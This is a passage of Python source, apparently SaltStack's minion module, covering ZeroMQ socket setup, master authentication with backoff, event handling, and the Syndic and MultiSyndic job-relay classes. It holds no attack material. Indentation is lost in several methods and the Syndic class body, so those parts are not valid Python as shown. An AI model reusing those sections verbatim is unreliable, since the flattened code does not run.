'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
    '''
    Apply the configured TCP keepalive options to the publish socket,
    when the bound zmq version exposes them.
    '''
    if not hasattr(zmq, 'TCP_KEEPALIVE'):
        return
    # (zmq socket option, minion config key) pairs, applied in order
    keepalive_opts = (
        (zmq.TCP_KEEPALIVE, 'tcp_keepalive'),
        (zmq.TCP_KEEPALIVE_IDLE, 'tcp_keepalive_idle'),
        (zmq.TCP_KEEPALIVE_CNT, 'tcp_keepalive_cnt'),
        (zmq.TCP_KEEPALIVE_INTVL, 'tcp_keepalive_intvl'),
    )
    for sockopt, conf_key in keepalive_opts:
        self.socket.setsockopt(sockopt, self.opts[conf_key])
def _set_reconnect_ivl(self):
    '''
    Configure the zmq reconnect interval on the publish socket,
    optionally randomized between recon_default and
    recon_default + recon_max.
    '''
    recon_delay = self.opts['recon_default']
    if self.opts['recon_randomize']:
        lower = self.opts['recon_default']
        upper = lower + self.opts['recon_max']
        recon_delay = randint(lower, upper)
        log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
            lower,
            upper,
            recon_delay)
        )
    log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
    self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
    '''
    Cap the zmq reconnect interval at the configured recon_max, when the
    bound zmq version exposes RECONNECT_IVL_MAX.
    '''
    if hasattr(zmq, 'RECONNECT_IVL_MAX'):
        # FIX: log the value that is actually applied; the old message
        # reported recon_default + recon_max while only recon_max was set
        log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
            self.opts['recon_max'])
        )
        self.socket.setsockopt(
            zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
        )
def _set_ipv4only(self):
    '''
    When IPv6 is enabled, clear IPV4ONLY on the socket so it serves
    both address families.
    '''
    ipv6_enabled = self.opts['ipv6'] is True
    if ipv6_enabled and hasattr(zmq, 'IPV4ONLY'):
        # IPv6 sockets work for both IPv6 and IPv4 addresses
        self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
    '''
    Tell the master this minion is alive, on both the legacy
    'minion_start' tag and the namespaced minion/<id>/start tag.
    '''
    for tag in ('minion_start',
                tagify([self.opts['id'], 'start'], 'minion')):
        self._fire_master(
            'Minion {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tag,
        )
def _setsockopts(self):
    '''
    Prepare the minion SUB socket: subscription filtering, identity,
    and the shared transport-level tuning.
    '''
    if not self.opts['zmq_filtering']:
        # No filtering: subscribe to every publication
        self.socket.setsockopt(zmq.SUBSCRIBE, '')
    else:
        # TODO: constants file for "broadcast"
        self.socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
        self.socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
    self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
    self._set_ipv4only()
    self._set_reconnect_ivl_max()
    self._set_tcp_keepalive()
@property
def master_pub(self):
    '''
    Return the zmq URL of the master publish port
    '''
    addr = {'ip': self.opts['master_ip'], 'port': self.publish_port}
    return 'tcp://{ip}:{port}'.format(**addr)
def authenticate(self, timeout=60, safe=True):
    '''
    Authenticate with the master, this method breaks the functional
    paradigm, it will update the master information from a fresh sign
    in, signing in can occur as often as needed to keep up with the
    revolving master AES key.

    :param timeout: per sign-in attempt timeout, in seconds
    :param safe: passed through to Auth.sign_in
    :return: 'full' when the master reports a full sign-in; otherwise
        None (credentials are stored on the instance)
    '''
    log.debug(
        'Attempting to authenticate with the Salt Master at {0}'.format(
            self.opts['master_ip']
        )
    )
    auth = salt.crypt.Auth(self.opts)
    self.tok = auth.gen_token('salt')
    acceptance_wait_time = self.opts['acceptance_wait_time']
    acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
    if not acceptance_wait_time_max:
        # No explicit max: never grow the wait beyond the initial value
        acceptance_wait_time_max = acceptance_wait_time
    # Retry until the key is accepted; 'retry' keeps looping, 'full'
    # short-circuits, anything else means we are authenticated
    while True:
        creds = auth.sign_in(timeout, safe)
        if creds == 'full':
            return creds
        elif creds != 'retry':
            log.info('Authentication with master at {0} successful!'.format(self.opts['master_ip']))
            break
        log.info('Waiting for minion key to be accepted by the master.')
        if acceptance_wait_time:
            log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time))
            time.sleep(acceptance_wait_time)
        if acceptance_wait_time < acceptance_wait_time_max:
            # Back off: double the wait, capped by the check above
            acceptance_wait_time += acceptance_wait_time
            log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
    self.aes = creds['aes']
    # A syndic may override the publish port it connects to
    if self.opts.get('syndic_master_publish_port'):
        self.publish_port = self.opts.get('syndic_master_publish_port')
    else:
        self.publish_port = creds['publish_port']
    self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
def module_refresh(self, force_refresh=False):
    '''
    Refresh the functions and returners.
    '''
    functions, returners, _errors = self._load_modules(force_refresh)
    self.functions = functions
    self.returners = returners
    # Keep the scheduler in sync with the freshly loaded modules
    self.schedule.functions = functions
    self.schedule.returners = returners
def pillar_refresh(self, force_refresh=False):
    '''
    Refresh the pillar
    '''
    pillar = salt.pillar.get_pillar(
        self.opts,
        self.opts['grains'],
        self.opts['id'],
        self.opts['environment'],
    )
    self.opts['pillar'] = pillar.compile_pillar()
    # Fresh pillar data can change which modules should be loaded
    self.module_refresh(force_refresh)
def manage_schedule(self, package):
    '''
    Refresh the functions and returners.

    Applies a schedule management command ('func') received over the
    local event bus to the minion scheduler.
    '''
    tag, data = salt.utils.event.MinionEvent.unpack(package)
    func = data.get('func', None)
    name = data.get('name', None)
    schedule = data.get('schedule', None)
    where = data.get('where', None)
    # Map each command to the scheduler call and the arguments it needs
    actions = {
        'delete': (self.schedule.delete_job, (name,)),
        'add': (self.schedule.add_job, (schedule,)),
        'modify': (self.schedule.modify_job, (name, schedule, where)),
        'enable': (self.schedule.enable_schedule, ()),
        'disable': (self.schedule.disable_schedule, ()),
        'enable_job': (self.schedule.enable_job, (name, where)),
        'run_job': (self.schedule.run_job, (name, where)),
        'disable_job': (self.schedule.disable_job, (name, where)),
        'reload': (self.schedule.reload, (schedule,)),
    }
    if func in actions:
        method, args = actions[func]
        method(*args)
def environ_setenv(self, package):
    '''
    Set the salt-minion main process environment according to
    the data contained in the minion event data
    '''
    tag, data = salt.utils.event.MinionEvent.unpack(package)
    environ = data.get('environ', None)
    if environ is None:
        return False
    # Deferred import kept from the original implementation
    import salt.modules.environ as mod_environ
    return mod_environ.setenv(
        environ,
        data.get('false_unsets', False),
        data.get('clear_all', False),
    )
def clean_die(self, signum, frame):
    '''
    Python does not handle the SIGTERM cleanly, if it is signaled exit
    the minion process cleanly

    :param signum: the delivered signal number
    :param frame: current stack frame at signal delivery (unused)
    '''
    # Stop the tune_in loop before raising SystemExit
    self._running = False
    exit(0)
def _pre_tune(self):
    '''
    Set the minion running flag and issue the appropriate warnings if
    the minion cannot be started or is already running
    '''
    # _running acts as a tri-state: None = never started, True =
    # currently running, False = scheduled to stop
    if self._running is None:
        self._running = True
    elif self._running is False:
        log.error(
            'This {0} was scheduled to stop. Not running '
            '{0}.tune_in()'.format(self.__class__.__name__)
        )
        return
    elif self._running is True:
        log.error(
            'This {0} is already running. Not running '
            '{0}.tune_in()'.format(self.__class__.__name__)
        )
        return
    try:
        log.info(
            '{0} is starting as user \'{1}\''.format(
                self.__class__.__name__,
                salt.utils.get_user()
            )
        )
    except Exception as err:
        # Only windows is allowed to fail here. See #3189. Log as debug in
        # that case. Else, error.
        log.log(
            salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
            'Failed to get the user who is starting {0}'.format(
                self.__class__.__name__
            ),
            exc_info=err
        )
def _mine_send(self, package):
    '''
    Send mine data to the master

    :param package: raw event package carrying the mine load
    :return: the master's reply to the mine load
    '''
    load = salt.utils.event.SaltEvent.unpack(package)[1]
    channel = salt.transport.Channel.factory(self.opts)
    return channel.send(load)
def handle_event(self, package):
    '''
    Handle an event from the epull_sock (all local minion events)

    Dispatches on the package's tag prefix: module/pillar/grains
    refreshes, schedule management, mine data, master event forwarding,
    and master connectivity transitions.
    '''
    log.debug('Handling event {0!r}'.format(package))
    if package.startswith('module_refresh'):
        self.module_refresh()
    elif package.startswith('pillar_refresh'):
        self.pillar_refresh()
    elif package.startswith('manage_schedule'):
        self.manage_schedule(package)
    elif package.startswith('grains_refresh'):
        # Only refresh when the grains actually changed
        if self.grains_cache != self.opts['grains']:
            self.pillar_refresh(force_refresh=True)
            self.grains_cache = self.opts['grains']
    elif package.startswith('environ_setenv'):
        self.environ_setenv(package)
    elif package.startswith('_minion_mine'):
        self._mine_send(package)
    elif package.startswith('fire_master'):
        # Forward a locally fired event up to the master
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
        self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
    elif package.startswith('__master_disconnected'):
        tag, data = salt.utils.event.MinionEvent.unpack(package)
        # if the master disconnect event is for a different master, raise an exception
        if data['master'] != self.opts['master']:
            raise Exception()
        if self.connected:
            # we are not connected anymore
            self.connected = False
            # modify the scheduled job to fire only on reconnect
            schedule = {
                'function': 'status.master',
                'seconds': self.opts['master_alive_interval'],
                'jid_include': True,
                'maxrunning': 2,
                'kwargs': {'master_ip': self.opts['master'],
                           'connected': False}
            }
            self.schedule.modify_job(name='__master_alive',
                                     schedule=schedule)
            log.info('Connection to master {0} lost'.format(self.opts['master']))
            if self.opts['master_type'] == 'failover':
                log.info('Trying to tune in to next master from master-list')
                # if eval_master finds a new master for us, self.connected
                # will be True again on successfull master authentication
                self.opts['master'] = self.eval_master(opts=self.opts,
                                                       failed=True)
                if self.connected:
                    # re-init the subsystems to work with the new master
                    log.info('Re-initialising subsystems for new '
                             'master {0}'.format(self.opts['master']))
                    # Tear down and rebuild the zmq machinery against
                    # the new master's publish socket
                    del self.socket
                    del self.context
                    del self.poller
                    self._init_context_and_poller()
                    self.socket = self.context.socket(zmq.SUB)
                    self._set_reconnect_ivl()
                    self._setsockopts()
                    self.socket.connect(self.master_pub)
                    self.poller.register(self.socket, zmq.POLLIN)
                    self.poller.register(self.epull_sock, zmq.POLLIN)
                    self._fire_master_minion_start()
                    log.info('Minion is ready to receive requests!')
                    # update scheduled job to run with the new master addr
                    schedule = {
                        'function': 'status.master',
                        'seconds': self.opts['master_alive_interval'],
                        'jid_include': True,
                        'maxrunning': 2,
                        'kwargs': {'master_ip': self.opts['master'],
                                   'connected': True}
                    }
                    self.schedule.modify_job(name='__master_alive',
                                             schedule=schedule)
    elif package.startswith('__master_connected'):
        # handle this event only once. otherwise it will pollute the log
        if not self.connected:
            log.info('Connection to master {0} re-established'.format(self.opts['master']))
            self.connected = True
            # modify the __master_alive job to only fire,
            # if the connection is lost again
            schedule = {
                'function': 'status.master',
                'seconds': self.opts['master_alive_interval'],
                'jid_include': True,
                'maxrunning': 2,
                'kwargs': {'master_ip': self.opts['master'],
                           'connected': True}
            }
            self.schedule.modify_job(name='__master_alive',
                                     schedule=schedule)
# Main Minion Tune In
def tune_in(self):
    '''
    Lock onto the publisher. This is the main event loop for the minion
    :rtype : None
    '''
    self._pre_tune()
    # Properly exit if a SIGTERM is signalled
    signal.signal(signal.SIGTERM, self.clean_die)
    log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
    self._prepare_minion_event_system()
    # Build the SUB socket to the master publisher and register both it
    # and the local event pull socket with the poller
    self.socket = self.context.socket(zmq.SUB)
    self._set_reconnect_ivl()
    self._setsockopts()
    self.socket.connect(self.master_pub)
    self.poller.register(self.socket, zmq.POLLIN)
    self.poller.register(self.epull_sock, zmq.POLLIN)
    self._fire_master_minion_start()
    log.info('Minion is ready to receive requests!')
    # Make sure to gracefully handle SIGUSR1
    enable_sigusr1_handler()
    # Make sure to gracefully handle CTRL_LOGOFF_EVENT
    salt.utils.enable_ctrl_logoff_handler()
    # On first startup execute a state run if configured to do so
    self._state_run()
    loop_interval = int(self.opts['loop_interval'])
    try:
        if self.opts['grains_refresh_every']:  # If exists and is not zero. In minutes, not seconds!
            if self.opts['grains_refresh_every'] > 1:
                log.debug(
                    'Enabling the grains refresher. Will run every {0} minutes.'.format(
                        self.opts['grains_refresh_every'])
                )
            else:  # Clean up minute vs. minutes in log message
                log.debug(
                    'Enabling the grains refresher. Will run every {0} minute.'.format(
                        self.opts['grains_refresh_every'])
                )
            self._refresh_grains_watcher(
                abs(self.opts['grains_refresh_every'])
            )
    except Exception as exc:
        # The refresher is optional; a failure here must not stop tune_in
        log.error(
            'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
                exc)
        )
    ping_interval = self.opts.get('ping_interval', 0) * 60
    ping_at = None
    while self._running is True:
        loop_interval = self.process_schedule(self, loop_interval)
        try:
            socks = self._do_poll(loop_interval)
            if ping_interval > 0:
                # Reset the ping deadline whenever traffic arrives;
                # ping the master only after a quiet period
                if socks or not ping_at:
                    ping_at = time.time() + ping_interval
                if ping_at < time.time():
                    log.debug('Ping master')
                    self._fire_master('ping', 'minion_ping')
                    ping_at = time.time() + ping_interval
            self._do_socket_recv(socks)
            # Check the event system
            if socks.get(self.epull_sock) == zmq.POLLIN:
                package = self.epull_sock.recv(zmq.NOBLOCK)
                try:
                    self.handle_event(package)
                    self.epub_sock.send(package)
                except Exception:
                    log.debug('Exception while handling events', exc_info=True)
            # Add an extra fallback in case a forked process leeks through
            multiprocessing.active_children()
        except zmq.ZMQError as exc:
            # The interrupt caused by python handling the
            # SIGCHLD. Throws this error with errno == EINTR.
            # Nothing to receive on the zmq socket throws this error
            # with EAGAIN.
            # Both are safe to ignore
            if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
                log.critical('Unexpected ZMQError while polling minion',
                             exc_info=True)
            continue
        except SaltClientError:
            # Propagate client errors to the caller
            raise
        except Exception:
            log.critical(
                'An exception occurred while polling the minion',
                exc_info=True
            )
def tune_in_no_block(self):
    '''
    Executes the tune_in sequence but omits extra logging and the
    management of the event bus assuming that these are handled outside
    the tune_in sequence

    This is a generator: it yields True after a recovered polling error
    so an external loop can drive the minion.
    '''
    self._pre_tune()
    self._init_context_and_poller()
    self.socket = self.context.socket(zmq.SUB)
    self._setsockopts()
    self.socket.connect(self.master_pub)
    self.poller.register(self.socket, zmq.POLLIN)
    self._fire_master_minion_start()
    loop_interval = int(self.opts['loop_interval'])
    # On first startup execute a state run if configured to do so
    self._state_run()
    while self._running is True:
        try:
            socks = self._do_poll(loop_interval)
            self._do_socket_recv(socks)
            # Check the event system
        except zmq.ZMQError:
            # If a zeromq error happens recover
            yield True
        except Exception:
            log.critical(
                'An exception occurred while polling the minion',
                exc_info=True
            )
            yield True
def _do_poll(self, loop_interval):
    '''
    Poll the registered sockets and return a dict mapping socket to
    event mask. ``loop_interval`` is in seconds; zmq wants milliseconds.
    '''
    log.trace('Check main poller timeout {0}'.format(loop_interval))
    poll_ms = loop_interval * 1000
    return dict(self.poller.poll(poll_ms))
def _do_socket_recv(self, socks):
    '''
    Drain one publication from the master PUB socket (when the poll
    result shows it is readable), decode it, and hand it off to the
    payload handler.

    :param socks: dict of socket -> event mask from the poller
    :raises Exception: on a publication with an unexpected frame count
    '''
    if socks.get(self.socket) != zmq.POLLIN:
        return
    # topic filtering is done at the zmq level, so we just strip it
    messages = self.socket.recv_multipart(zmq.NOBLOCK)
    messages_len = len(messages)
    # if it was one message, then its old style
    if messages_len == 1:
        payload = self.serial.loads(messages[0])
    # 2 includes a header which says who should do it
    elif messages_len == 2:
        payload = self.serial.loads(messages[1])
    else:
        # BUGFIX: the original formatted len(messages_len) -- len() of an
        # int raises TypeError and masked the intended error message
        raise Exception(('Invalid number of messages ({0}) in zeromq pub'
                         'message from master').format(messages_len))
    log.trace('Handling payload')
    self._handle_payload(payload)
def destroy(self):
    '''
    Tear down the minion

    Stops the tune_in loop, closes every socket registered with the
    poller plus the event pub/pull and master SUB sockets, and finally
    terminates the zmq context.
    '''
    self._running = False
    if getattr(self, 'poller', None) is not None:
        # poller.sockets is a dict in newer pyzmq and a list of
        # (socket, flags) tuples in older versions -- handle both
        if isinstance(self.poller.sockets, dict):
            for socket in self.poller.sockets.keys():
                if socket.closed is False:
                    socket.close()
                self.poller.unregister(socket)
        else:
            for socket in self.poller.sockets:
                if socket[0].closed is False:
                    socket[0].close()
                self.poller.unregister(socket[0])
    # Close sockets before terminating the context so term() cannot hang
    if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
        self.epub_sock.close()
    if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
        self.epull_sock.close()
    if hasattr(self, 'socket') and self.socket.closed is False:
        self.socket.close()
    if hasattr(self, 'context') and self.context.closed is False:
        self.context.term()
def __del__(self):
    # Ensure sockets and the zmq context are released when the minion
    # object is garbage collected
    self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
    '''
    Build a syndic: a minion that authenticates to a higher-level
    master, forcing safe-mode auth and a 1s loop interval before
    delegating to Minion.__init__.
    '''
    # Saved for tune_in, where it is injected into the local client opts
    self._syndic_interface = opts.get('interface')
    self._syndic = True
    # force auth_safemode True because Syndic don't support autorestart
    opts['auth_safemode'] = True
    opts['loop_interval'] = 1
    super(Syndic, self).__init__(opts, **kwargs)
    # Master-side minion used to reach the local master's job cache
    self.mminion = salt.minion.MasterMinion(opts)
def _handle_aes(self, load, sig=None):
    '''
    Takes the AES encrypted load, decrypts it, and runs the encapsulated
    instructions

    Unlike Minion._handle_aes, no signature verification or minion-side
    target matching is performed here; the publication is forwarded on.
    '''
    # If the AES authentication has changed, re-authenticate
    try:
        data = self.crypticle.loads(load)
    except AuthenticationError:
        self.authenticate()
        data = self.crypticle.loads(load)
    # Verify that the publication is valid
    if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
            or 'arg' not in data:
        return
    # Decrement the hop count so the timeout shrinks at each syndic level
    data['to'] = int(data.get('to', self.opts['timeout'])) - 1
    if 'user' in data:
        log.debug(
            'User {0[user]} Executing syndic command {0[fun]} with '
            'jid {0[jid]}'.format(
                data
            )
        )
    else:
        log.debug(
            'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
                data
            )
        )
    log.debug('Command details: {0}'.format(data))
    self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
    '''
    Take the now clear load and forward it on to the client cmd

    :param data: the decoded publication from the higher-level master
    '''
    # Set up default tgt_type
    if 'tgt_type' not in data:
        data['tgt_type'] = 'glob'
    kwargs = {}
    # optionally add a few fields to the publish data
    for field in ('master_id',  # which master the job came from
                  'user',  # which user ran the job
                  ):
        if field in data:
            kwargs[field] = data[field]
    # BUGFIX: the original passed both user=data.get('user', '') and
    # **kwargs; when 'user' was in data, kwargs also contained 'user',
    # raising TypeError (multiple values for keyword argument 'user').
    # Keep the default-empty-user behavior via setdefault instead.
    kwargs.setdefault('user', data.get('user', ''))
    # Send out the publication
    self.local.pub(data['tgt'],
                   data['fun'],
                   data['arg'],
                   data['tgt_type'],
                   data['ret'],
                   data['jid'],
                   data['to'],
                   **kwargs)
def _setsockopts(self):
    '''
    Configure the syndic SUB socket: subscribe to everything, set the
    identity, and apply the shared transport tuning.
    '''
    # no filters for syndication masters, unless we want to maintain a
    # list of all connected minions and update the filter
    sock = self.socket
    sock.setsockopt(zmq.SUBSCRIBE, '')
    sock.setsockopt(zmq.IDENTITY, self.opts['id'])
    self._set_reconnect_ivl_max()
    self._set_tcp_keepalive()
    self._set_ipv4only()
def _fire_master_syndic_start(self):
    '''
    Tell the master this syndic is alive, on both the legacy
    'syndic_start' tag and the namespaced syndic/<id>/start tag.
    '''
    for tag in ('syndic_start',
                tagify([self.opts['id'], 'start'], 'syndic')):
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tag,
        )
def tune_in_no_block(self):
    '''
    Executes the tune_in sequence but omits extra logging and the
    management of the event bus assuming that these are handled outside
    the tune_in sequence

    This is a generator: it yields True after a recovered polling error
    so an external loop can drive the syndic.
    '''
    # Instantiate the local client
    self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
    self.local.event.subscribe('')
    self._init_context_and_poller()
    # SUB socket to the higher-level master's publisher
    self.socket = self.context.socket(zmq.SUB)
    self._setsockopts()
    self.socket.connect(self.master_pub)
    self.poller.register(self.socket, zmq.POLLIN)
    loop_interval = int(self.opts['loop_interval'])
    self._fire_master_syndic_start()
    while True:
        try:
            socks = dict(self.poller.poll(loop_interval * 1000))
            if socks.get(self.socket) == zmq.POLLIN:
                self._process_cmd_socket()
        except zmq.ZMQError:
            # Recoverable zmq hiccup: hand control back to the caller
            yield True
        except Exception:
            log.critical(
                'An exception occurred while polling the minion',
                exc_info=True
            )
            yield True
# Syndic Tune In
def tune_in(self):
    '''
    Lock onto the publisher. This is the main event loop for the syndic
    '''
    signal.signal(signal.SIGTERM, self.clean_die)
    log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
    self._init_context_and_poller()
    # Instantiate the local client
    self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
    self.local.event.subscribe('')
    self.local.opts['interface'] = self._syndic_interface
    # register the event sub to the poller
    self.poller.register(self.local.event.sub)
    # Start with the publish socket
    # Share the poller with the event object
    self.socket = self.context.socket(zmq.SUB)
    self._setsockopts()
    self.socket.connect(self.master_pub)
    self.poller.register(self.socket, zmq.POLLIN)
    # Send an event to the master that the minion is live
    self._fire_master_syndic_start()
    # Make sure to gracefully handle SIGUSR1
    enable_sigusr1_handler()
    loop_interval = int(self.opts['loop_interval'])
    self._reset_event_aggregation()
    while True:
        try:
            # Do all the maths in seconds
            timeout = loop_interval
            # Shrink the poll timeout so we wake up in time to forward
            # any aggregated events when their deadline arrives
            if self.event_forward_timeout is not None:
                timeout = min(timeout,
                              self.event_forward_timeout - time.time())
            if timeout >= 0:
                log.trace('Polling timeout: %f', timeout)
                socks = dict(self.poller.poll(timeout * 1000))
            else:
                # This shouldn't really happen.
                # But there's no harm being defensive
                log.warning('Negative timeout in syndic main loop')
                socks = {}
            if socks.get(self.socket) == zmq.POLLIN:
                self._process_cmd_socket()
            if socks.get(self.local.event.sub) == zmq.POLLIN:
                self._process_event_socket()
            # Deadline reached: flush aggregated events up to the master
            if self.event_forward_timeout is not None and \
                    self.event_forward_timeout < time.time():
                self._forward_events()
        # We don't handle ZMQErrors like the other minions
        # I've put explicit handling around the receive calls
        # in the process_*_socket methods. If we see any other
        # errors they may need some kind of handling so log them
        # for now.
        except Exception:
            log.critical(
                'An exception occurred while polling the syndic',
                exc_info=True
            )
def _process_cmd_socket(self):
try:
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
idx = None
if messages_len == 1:
idx = 0
elif messages_len == 2:
idx = 1
else:
raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
payload = self.serial.loads(messages[idx])
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
    def _process_event_socket(self):
        '''
        Drain pending events from the local event bus, aggregating job
        returns into self.jids and other events into self.raw_events.

        Processing is bounded by syndic_max_event_process_time so a busy
        event bus cannot starve the main loop.
        '''
        tout = time.time() + self.opts['syndic_max_event_process_time']
        while tout > time.time():
            try:
                event = self.local.event.get_event_noblock()
            except zmq.ZMQError as e:
                # EAGAIN indicates no more events at the moment
                # EINTR some kind of signal maybe someone trying
                # to get us to quit so escape our timeout
                if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
                    break
                raise
            log.trace('Got event {0}'.format(event['tag']))
            # arm the forward timeout on the first event of a window
            if self.event_forward_timeout is None:
                self.event_forward_timeout = (
                        time.time() + self.opts['syndic_event_forward_timeout']
                        )
            if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']:
                if 'jid' not in event['data']:
                    # Not a job return
                    continue
                jdict = self.jids.setdefault(event['tag'], {})
                if not jdict:
                    # first return for this jid: seed the job metadata
                    jdict['__fun__'] = event['data'].get('fun')
                    jdict['__jid__'] = event['data']['jid']
                    jdict['__load__'] = {}
                    fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](event['data']['jid'])
                        )
                if 'master_id' in event['data']:
                    jdict['master_id'] = event['data']['master_id']
                # record this minion's return keyed by minion id
                jdict[event['data']['id']] = event['data']['return']
            else:
                # Add generic event aggregation here
                if 'retcode' not in event['data']:
                    self.raw_events.append(event)
    def _forward_events(self):
        '''
        Push everything aggregated so far up to the master: raw events via
        _fire_master (tagged under 'syndic') and per-jid returns via
        _return_pub, then reset the aggregation state.
        '''
        log.trace('Forwarding events')
        if self.raw_events:
            self._fire_master(events=self.raw_events,
                              pretag=tagify(self.opts['id'], base='syndic'),
                              )
        for jid in self.jids:
            self._return_pub(self.jids[jid], '_syndic_return')
        self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class MultiSyndic(MinionBase):
    '''
    Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
    all minions connected to it to the list of masters it is connected to.

    Note: jobs will be returned best-effort to the requesting master. This also means
    (since we are using zmq) that if a job was fired and the master disconnects
    between the publish and return, that the return will end up in a zmq buffer
    in this Syndic headed to that original master.

    In addition, since these classes all seem to use a mix of blocking and non-blocking
    calls (with varying timeouts along the way) this daemon does not handle failure well,
    it will (under most circumstances) stall the daemon for ~60s attempting to re-auth
    with the down master
    '''
    # time to connect to upstream master
    SYNDIC_CONNECT_TIMEOUT = 5

    def __init__(self, opts):
        # poll frequently so dead masters are retried promptly
        opts['loop_interval'] = 1
        super(MultiSyndic, self).__init__(opts)
        self.mminion = salt.minion.MasterMinion(opts)
        # create all of the syndics you need
        self.master_syndics = {}
        for master in set(self.opts['master']):
            s_opts = copy.copy(self.opts)
            s_opts['master'] = master
            # per-master state: opts copy, auth backoff, and a dead-until stamp
            self.master_syndics[master] = {'opts': s_opts,
                                           'auth_wait': s_opts['acceptance_wait_time'],
                                           'dead_until': 0}
            self._connect_to_master(master)

    # TODO: do we need all of this?
    def _connect_to_master(self, master):
        '''
        Attempt to connect to master, including back-off for each one

        return boolean of whether you connected or not
        '''
        if master not in self.master_syndics:
            log.error('Unable to connect to {0}, not in the list of masters'.format(master))
            return False
        minion = self.master_syndics[master]
        # if we need to be dead for a while, stay that way
        if minion['dead_until'] > time.time():
            return False
        # only retry once the backoff window since the last attempt has passed
        if time.time() - minion['auth_wait'] > minion.get('last', 0):
            try:
                t_minion = Syndic(minion['opts'],
                                  timeout=self.SYNDIC_CONNECT_TIMEOUT,
                                  safe=False,
                                  )
                self.master_syndics[master]['syndic'] = t_minion
                self.master_syndics[master]['generator'] = t_minion.tune_in_no_block()
                # success: reset backoff and liveness state
                self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time']
                self.master_syndics[master]['dead_until'] = 0
                return True
            except SaltClientError:
                log.error('Error while bring up minion for multi-syndic. Is master {0} responding?'.format(master))
                # re-use auth-wait as backoff for syndic
                minion['dead_until'] = time.time() + minion['auth_wait']
                if minion['auth_wait'] < self.opts['acceptance_wait_time_max']:
                    minion['auth_wait'] += self.opts['acceptance_wait_time']
        return False

    def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
        '''
        Wrapper to call a given func on a syndic, best effort to get the one you asked for

        Tries master_id first (when connected and alive), then the remaining
        masters in random order; marks a syndic dead on SaltClientError.
        '''
        if kwargs is None:
            kwargs = {}
        for master, syndic_dict in self.iter_master_options(master_id):
            if 'syndic' not in syndic_dict:
                continue
            if syndic_dict['dead_until'] > time.time():
                log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master_id))
                continue
            try:
                getattr(syndic_dict['syndic'], func)(*args, **kwargs)
                return
            except SaltClientError:
                log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
                # re-use auth-wait as backoff for syndic
                syndic_dict['dead_until'] = time.time() + syndic_dict['auth_wait']
                if syndic_dict['auth_wait'] < self.opts['acceptance_wait_time_max']:
                    syndic_dict['auth_wait'] += self.opts['acceptance_wait_time']
                continue
        log.critical('Unable to call {0} on any masters!'.format(func))

    def iter_master_options(self, master_id=None):
        '''
        Iterate (in order) over your options for master

        Yields (master_id, state_dict) pairs, starting with the requested
        master_id when known, then the rest in shuffled order.
        '''
        masters = list(self.master_syndics.keys())
        shuffle(masters)
        if master_id not in self.master_syndics:
            master_id = masters.pop(0)
        else:
            masters.remove(master_id)
        while True:
            yield master_id, self.master_syndics[master_id]
            if len(masters) == 0:
                break
            master_id = masters.pop(0)

    def _reset_event_aggregation(self):
        # clear aggregated job returns / raw events and disarm the timer
        self.jids = {}
        self.raw_events = []
        self.event_forward_timeout = None

    # Syndic Tune In
    def tune_in(self):
        '''
        Lock onto the publisher. This is the main event loop for the syndic
        '''
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')
        log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
        # Share the poller with the event object
        self.poller = self.local.event.poller
